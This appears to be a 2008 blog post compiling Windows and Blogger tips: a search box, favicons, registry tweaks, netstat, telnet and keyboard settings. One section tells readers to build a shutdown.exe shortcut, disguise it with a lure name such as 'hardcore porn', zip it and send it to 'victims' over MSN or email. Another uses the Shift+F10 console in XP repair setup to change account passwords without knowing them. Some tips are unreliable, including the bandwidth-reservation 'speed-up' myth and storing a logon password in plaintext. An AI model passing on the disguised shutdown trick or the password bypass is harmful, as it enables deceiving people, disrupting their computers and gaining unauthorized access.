Thursday, May 22, 2008

How to add search box in blogger

The Google Navigation bar at the top of your Blogger blogs has an embedded search box. However, you may want to include a similar box in the main body of your blog (like what I have done), or the sidebar. Other than the convenience for users, the added advantage is that unlike Google search box, the search results of this search box appear in the main body of your Blog.

Under Template->Page Elements tab, click “Add a Page Element” at the place where you want your search box to appear. Select “HTML/JavaScript”.

There are several HTML codes posted on the net. I tried a few, and found the one that works as follows:-

<p align="left">
<form id="searchthis" action="YOUR BLOG URL/search" style="display:inline;" method="get">
<strong>NAME OF YOUR BLOG<br/></strong>
<input id="b-query" maxlength="255" name="q" size="20" type="text"/>
<input id="b-searchbtn" value="Search" type="submit"/>

Remember to change YOUR BLOG URL to the URL or web address of your Blog. Also, change the NAME OF YOUR BLOG to that which you want to call your site. For instance, if your Blog Name is long, you may want to write something like “Search Here” or “Search this site”.

How to add Favicon to Blogger

How to Create Your Own Favicon

Take a look at the icons on the right. Do you recognize any of them and the websites they go to? Many of them can be identified with a certain website by just looking them.
Favicons may be only 16×16 but they do have a very large impact on branding and your visitors web experience.

What should be your favicon?

It is hard sometimes to think of what image should be your favicon. It is not as simple as just resizing an image to 16×16 .ico formatted image. The problem that occurs is that not everything looks that great that small.

Usually you will attempt to resize part of your logo into a 16×16 space. If this does not work, you should either find or create a favicon that represents your websites theme. For example if your website is about cats, a favicon of a cat is a good idea. That is certainly an easy one, but you get the idea

What is the .ico format?

The .ico format is what your favicon needs to be saved as. In fact your favicon actually needs to be named favicon also. This format allows your browser to read the image and to display it on your tab bar, bookmarks, address bar, history and other areas.

Free websites that convert your images

Dynamic Drive Favicon Generator

Chami Favicon Generator

NOW upload the icon into some web folder, and create a link. You can read about using free hosts like Google Page Creator


which looks like this

where “yourname” is your Gmail account name, and “iconname” is the file name. Copy this URL.

Go back to your Blogger dashboard and under the Template tab, go to “Edit HTML”. Near the top you will see a line like this :-


Copy and paste the following code below the line :-

<link href='' rel='shortcut icon' type='image/'/>

Where “”. is your icon file


Other image types

The .ico image format has been used by many but you can also create an image under the .png or .gif format. Ensure that the size of the image is either 16x16 pixels or 32x32 pixels.

If you have a PNG format image, the link to insert is:-

<link href='' rel='shortcut icon' type='image/png'/>

If it is a GIF format image, the link is:-

<link href='' rel='shortcut icon' type='image/gif'/>

Tuesday, May 20, 2008

Recover Microsoft Windows XP, Vista, Office CD Key

1) Cd-Key reader is a handy utility that recovers Windows-based product cd keys in your computer. Simply run the program, let it does the scan, and it will retrieve those cdkeys for you.

2) If Cd-Key Reader doesn’t help you do the dirty work, Magical Jelly Bean Keyfinder v1.51 is a good alternative which serves the same purpose. The Magical Belly Keyfinder is a freeware that retrieves your Product Key used to install Windows and Microsoft Office from your registry. It was tested to be compatible with Windows 95, 98, Me, NT4, 2000, XP, Server 2003, Windows Vista, Office 97, Office XP, and Office 2003.

I personally have tried the two software and they both worked for me.

How to Hide specific Drives

This tutorial illustrates how to hide and show your computer drives from Windows XP. You can hide or show as you want both drives in your computer and drives in the computer network. This way can be safe for data in your computer and prevent others from accessing to your drives that may contain important information. This example I will hide drive D and you can apply this method to another drive you want, just change a value that I will explain “how to” in detail. Let you hide drives now.

Go to Start > Run .

Type regedit and then press Enter

follow path


Right click on the Explorer folder and select New > DWORD Value.

Name the registry NoDrives.

Double click on NoDrives which is in the right page.

In the DWORD Value window, select Decimal.

In this case I want to hide drive D, so I must fill 8 in Value data. The number you filled varies with drive you want it to be hidden. If you want to hide the other drives, you must put the drive-related number like below,

A=1, B=2, C=4, D=8, E=16, F=32, G=64, H=128, I=256, J=512, K=1024, L=2048, M=4096, N=8192, O=16384, P=32768, Q=65536, R=131072, S=262144, T=524288, U=1048576, V=2097152, W=4194304, X=8388608, Y=16777216, Z=33554432, All drive=67108863

For example, I can hide drive J only if I put the number 512 under selecting Decimal. What to do in case I prefer to hide more than one drive ? That is easy just plus the numbers. To illustrate, I want to hide drive C and E so I put the result number of 4 plus 16 that is 20.

Click OK button and close the Registry Editor program

Restart computer. Finish !

Speed up Internet Surfing.

We can increase speed for surfing the internet in several way but today I have an easy way for you to speed up your internet surfing. The Windows XP normally limit the internet speed by reserving a part of bandwidth. In this easy way I just only change the Bandwidth Limit value to zero.

Go to Start > Run.

Type gpedit.msc then click OK. Windows XP will lead you to Group Policy page.

In your left hand of the page, click on Administrative Templates which is under Computer Configuration.

Double click Network which is in the right hand of the page.

Double click QoS Packet Scheduler

Double click on Limit Reserve Bandwidth

Select the Enabled option.

In this box let you change the value to zero and then click OK.

10 Basic Tips For the Internet Explorer (IE)

In order to use the Internet Explorer (IE) effectively, we have some basic tips for you to try… Ok let’s go now.

1 To extend the window area of the IE, you can make it easy by pressing the F11 key. Then you press it again in order to return the IE to the normal window.

2 Sometimes you want to search a keyword in a long web page that you are surfing. How do you do ?? Just press Ctrl+F and place the keyword you want.

3 Using Backspace key in your keyboard instead of clicking Back in the IE window.

4 You can close your IE window that you are surfing by Ctrl+W.

5 To see the surfing websites history, Press F4 key to see the URL which you have typed.

6 Press Ctrl+D in order to save the url which you are surfing. And the url will be in the Favorites.

7 To send a web page to your friend. Do you know we can send it by email from the IE’s tools ? Let you try it, go to File > Send > Page by E-mail...

8 To slide the web page by using the keyboard, try it with the arrow keys. To slide it to the bottom and the top of the web page, try the End and Home key.

9 If you find a picture that you prefer it to be the desktop wallpaper, you can immediately set it, right click on the picture area and select the Set as wallpaper.

10 To slide the web page gradually, you may use the Page up, Page down and Spacebar keys. Try it !

How to check other ip address connecting to your computer

It is beneficial for your computer to observe other IP address connecting to your computer. In this way, you are able to be careful of many hackers who can delve into your secret in your computer. That is very scary ! Today I give you a tip for checking IP address of others which are connecting to your computer. You can check even the IP address coming from MSN. Do these steps.

Go to Start > Run .

Type cmd and then press Enter. The Windows will bring you to the DOS screen.

In the DOS screen, type the command netstat -an and then press Enter.

Now the DOS screen shows the list of ip address and port numbers that connect to your computer such as game server, MSN, and various web host you are surfing.

What is Windows registry ?

Windows XP Registry.

Registry is a central database which Windows use to store all the informations about Windows system and all the values of the software in your pc computers. The informations or values control all the hardware and software functions even the user setting. Whenever you add/change new hardware or install a new software. The informations in the Registry is called to change the values.

Actually, The registry is stored in your Hardisk called “Registry Hive“. Registry Hive is not put in a large single file, but it is devided into many small-multipled files in order to protect Windows damage and to be easy to manage all the registry functions. Each file in Registry Hive called “Hive File” stores each Windows setting. Hive file pick the informations in tree type start from The Root. Under the Root consist of the main part, Body of Keys, Subkeys, and all System Values. We realize that the Hive file is very significant to the Windows system. If you lose some files, you may spoil your computer system. So, Windows reserve the informations for protecting the system damage by backing up the file in .log format while we use a computer

Convert FAT32 to NTFS

I have an easy way to change your hardisk file system without formatting. “Convert FAT32 to NTFS”.

- Open Run box, go to Start > Run

- Type Convert X: /FS:NTFS , X is a computer’s drive you would like to convert.

- You are brought to a screen which you must follow the steps, then Windows restart itself. Finish!

Change Internet Explorer Logo

When you are surfing internet by Internet Explorer(IE), IE Logo in IE toolbar will indicate that Internet Explorer is working. Do you believe that you can change the logo image to whatever you want? Before you start to change it, you have to prepare your logo image. Your logo image have to be Bitmap file format, 22×22 pixel, and 256 color (16bit). You may use the ACDSee Program to costom the image. Ok, I suppose that you already had a logo image. Let’s begin now.

Click Start>Run.

Type regedit in the Run box and press Enter.

In the Registry Editor page, find the registry key

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar

Right click on the Toolbar folder and select New>String Value.

Name the String Value to be SmBrandBitmap.

Double click SmBrandBitmap and specify the image path like c:\image.bmp then click Ok.

Open the IE browser. The IE Logo is already changed.

How to Delete Shared Documents folder in My Computer

Windows OS always provides you the Shared Documents folder in My Computer. I know that most people do not use this folder and they cannot normally delete it. If you think it is no use to you, you may delete it forever. Ok, follow the steps.
Click Start > Run .

Type regedit and click Ok.

Go to the path below

Now delete the key


Restart your computer.

Now the Shared Documents folder is disappeared.

Prevent forgetting window password login

How To Create Password Recovery Disk?

To prevent forgetting window password login, you have to create the password recovery disk which is made by these steps.
In the Control Panel, select User Accounts.
Choose the account you want to create the password recovery disk.
Now click on the “Prevent a forgotten password” which is in the top left of the window.
Then the Windows launch “Fotgotten Password Wizard“. Now you follow the step by clicking “Next“.
Insert formatted disk in drive A. Then click Next.
Type the password and Finish !

How To Recover Window Login Password in Welcome Screen?
Click the password user list which is in the disket.
Click on the Question Mark Button. (?)
It appear the message “Did you forget your password ?“. Now you click the message “Use your password reset disk“.
You are brought to Password Reset Wizard process. You just pursue the step. Your PC computer are working again.

Automatically logon to Windows XP

It is useful when you want to share files with other computers. Others need to know your account name and password that they must put it in when they want to download files or access to your computer. You should not give your password to others anyway that will make your computer unprivate. However, this computer tip teaches you to logon to Windows XP automatically without filling in your account name and your secret password. This is also available for others who want to access to your computer to get files and documents, they do not have to fill in your password too. Therefore this tip benefits you to conceal your Windows logon password without depending upon any software. Take the easiest way by Windows Registry. Let do it now !
Get into Registry Editor by running regedit.
Find the path,

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Right click on the Winlogon folder and select New > String Value .

Name it DefaultUserName.

Double click on the DefaultUserName key that you have just created it.

In the Edit String window, change the Value data to your account name then click OK button.

Again right click on the Winlogon folder and select New > String Value .

Name String Value DefaultPassword.

Double click on the DefaultPassword key.

Now fill your Windows logon password in Value data and then click OK.

Again right click on the Winlogon folder and choose New > String Value .

Type DefaultDomainName for naming your new registry key.

Double click on DefaultDomainName and fill the domain of your computer then click OK.

Again right click on the Winlogon folder and choose New > String Value .

Name the new key AutoAdminLogon.

Double click on the AutoAdminLogon registry key.

In the Edit String window of the AutoAdminLogon registry key, change Value data to 1 and then click OK.

Finish !

How to Recover Deleted Files ?

Have You Ever imagined the situation of deleting important documents, mp3, images from your windows recycle bin and not even able to find out a solution to recover those important documents . IF YES, then you might be aware about the Data Loss Situation. This situation used to create panic in the organization and the first question to arise was – Now what to do?

In this article we will throw light when you had faced that slap your head moments on how to Recover Deleted Files when you have emptied the recycle bin OR pressed (shift+del) to permanently delete the file. Fortunately, the data is not completely lost and it will remain on your hard disk until something overwrites it. You may be concerned that you won’t be able to retrieve those important data but there is an answer for you, stop what you are doing and call in the data recovery experts.

Data Recovery Experts are able to recover lost data on almost any type or format of modern technology, media and memory storage devices. The definition of Data Recovery is “…Making previously lost or damaged data available again…”. Fortunately, there are lots of Data Recovery Methods and Data recovery Software available in the IT market to help you to get back your lost data and files.

Some major possible reasons for the loss of data:

1. The first and one of the most common reasons of data loss is hardware failure. When powering on your computer you might abruptly hear clicking, buzzing, scrapping and ratting sounds. These are the noises that come when the motor, electronic boards or magnetic platters get damaged due to any electric failure or a head crash. Alternately, the drive might also refuse to spin and results in inaccessible data.

2. Accidental deletion and overwriting is one of the main reason of data loss that more often happens. This event occurs when you overwrite any existing data or emptied the recycle bin. This is the data loss event of human error category.

3. Data loss may also occur due to Operating System failure. Operating system is system software that manages the hardware and enables its communication with software.The operating system corruption may results in cross linked files, lost clusters, file system corruption or invalid file directories. In this situation, strange error messages get generated or many files may get corrupted.

4. Virus attack can be another reason of data loss.

5. Data can also be lost due to some technical defect of failure of some software running on the computer.

These are the main five reasons of data loss, from which you should be aware of to avoid your valuable data from loss. If you have experienced data loss due to any of the reason, you need for data recovery to recover your valuable data.

With Recover Data for FAT & NTFS you are just four steps away from your vital, crucial and confidential data. No need to take your system anywhere for data recovery in case of data loss. Just install Recover Deleted Files and enjoy the retrieval of lost files and folders.
Recover Deleted Files is available at for free evaluation. The Evaluation or Demo version of Recover Deleted Files recover files but restricts the File saving option.

Protecting against Viruses and Worms

The Internet is a great place to be, but it's also dangerous. Virus and worms are deadly cretins that can have adverse effects on your computer and your productivity. Here are a few pointers to help you prevent the invasion of virus and worms on your system.

Invest in a good anti-virus software. There are many to choose from. The popular one being, Norton's Anti-virus, Dr. Solomon's Anti-virus and McAffee.

Frequently download the updates to the anti-virus you are using

Backup important data on a regular basis.

Never open email attachments from unknown sources.

Never download and install .exe files from personal web sites. For example, if you want a free software, it's better to download it from the developer's web site or from known and respected directories such as Tucows than from a web site of an individual.

Restrain yourself from downloading MicroSoft Office files from unfamiliar sites.

Increase the security level of your browser. For Internet Explorer version 4, go to View - Internet Options. Click on the Security tab and choose High or Medium security level.

Download and install updates for browsers and email programs you use. The MicroSoft site has a tool that automatically checks which security features your system needs. You can find more information about it here.

Keep yourself updated with annoucements on newly found virus and worms.

Extreme precaution

Ruthlessly delete emails with attachments.

Install two anti-virus scanners. No single anti-virus program is fool-proof. Using two at the same time increases your chances of detecting and deleting the virus/worm.

Disable receiving emails in html format.

Using Telnet on Windows

Telnet allows you to connect to another computer. Thus, your computer starts behaving like a terminal of the remote machine. In this tip, we look at how a successful Telnet session can be executed under Windows. Details on Telnet can be found here.
Telnet connections are established only when your computer is connected to the Internet. So, first start your ISP internet service.

Step 1

Click Start - Run. Type "telnet" in the pop-up window.

Step 2
The Telnet window opens up. Click on Connect - Remote System...

Step 3
You will find three fields in the Connect window. The first lets you specify the Host Name, the second one Port and the third, the Terminal Type.
You can use either the domain name or the IP address in the host name field. So, if I want to connect to my font site, I type
Select Telnet as the port and vt100 as the terminal type.
Click on the Connect button to start the telnet session.

Step 4
The program now tries to find the host and establish a link.
Once a connection has been successfully set up, a welcome message and a login prompt will be displayed in the window.

Step 4
The program now tries to find the host and establish a link.
Once a connection has been successfully set up, a welcome message and a login prompt will be displayed in the window.

Step 5
Type in the login name and hit the enter key. You would then be asked for the password. Note: What you type at the password prompt is not displayed on the screen.
Hit the enter key once again to send the password information to the remote machine.

You shall be prompted again if the login name and password are incorrect. However, if everything goes right, a prompt is displayed. Since Fontmagic is hosted on a Linux server, I get a Linux shell prompt.

The Telnet window now acts as a terminal of the remote machine and you can manipulate files, execute commands or run programs on the remote computer.

To close the telnet session, type "logout" at the prompt.

How to take a screen shot of a web site

There are times when you like to take a screen shot of a web site because you like the design or want to send information to a client. Whatever your reason might be, you don't need a dedicated screen capture program for this simple job. It's easy to do it from your keyboard.

Windows System

On Windows systems, hit your Print Screen key. This copies the screen and places it in your clipboard. Now open any image editor and click Edit - Paste. Save this new image in any format you want.
In order to capture only the active window (the window that has the focus), hit ALT + Print Screen.
You can use any image editor, Adobe PhotoShop, Paint Shop Pro, FireWorks or even Paint.
By the by, Paint Shop pro come along with a nifty screen capture utility found under Capture in the menu bar.

Macintosh System
On a Mac, hit Apple + Shift + 3.

Linux System
Linux systems usually come with a free screen capture utility. For example, you can find one under the KDE desktop.

How To Change Keyboard Language In Windows XP

If you want to learn how to change your keyboard language while using Windows XP, you come to the right article. It’s fairly easy once you know how it’s done and by the end of this article you will.Of course, the first step is to sit in front of your turned on computer which I assume you are since you’re reading this article. Now that you’re sitting comfortably, you can begin to change your keyboard language.

1. Click the Start button at the bottom left corner of the screen. This will present you with a long two column menu. On the right menu, click the option Control Panel.

2. There are 2 options in which the Control Panel icons may be presented: catergory or classic. You want to be in Classic view. You can see at the left side of the Control Panel which view you’re currently in. If it says Switch To Category View, it means you’re now in Classic view which is what you want. If it says Switch to Classic View, click that link.

3. In The Control panel, click the Regional and Language Options icon. This will open a small dialog. You’re about halfway to changing your keyboard language.

4. In this new dialog, you will see 3 tabs. The middle one reads Languages. Click on that.

5. In the top half of this tab, you will see a button which reads Details. Click on that button. A new dialog window will open.

6. In The lower half of the new dialog window, you will see and Add button. This will open yet another dialog window.

7. At the top half of this screen, you will see a Combo under the title of Input Language. Choose the language you wish to add and click OK twice.

8. Look at the bottom of your screen in what is known as the System Tray (bottom right corner), you will see an indication of the current language you’re using (EN signifies English). You can now switch between the different language you’ve installed by pressing Alt+Shift keys.

There you have it. You’ve successfully changed your keyboard language.

Shutdown a Computer via MSN

Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"

You can change "this is a virus" to anything you would like that’s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game, hardcore porn. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great"
Don’t forget to add the .zip at the end.
WARING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a
That’s about it have fun guys.

Recovering password in XP

Many times we forget our Windows password. Then we panic, call experts and finally we lose all important information saved in Windows. Now here is a way by which we can recover Windows password easily.

1. Place your Windows XP CD in your CD ROM and start your computer (it’s assumed here that your XP CD is bootable – as it should be - and that you have your BIOS set to boot from CD)

2. Keep your eye on the screen messages for booting to your CD typically; it will be “Press any key to boot from CD”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.
It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”

Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (This will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”)

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

13. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.
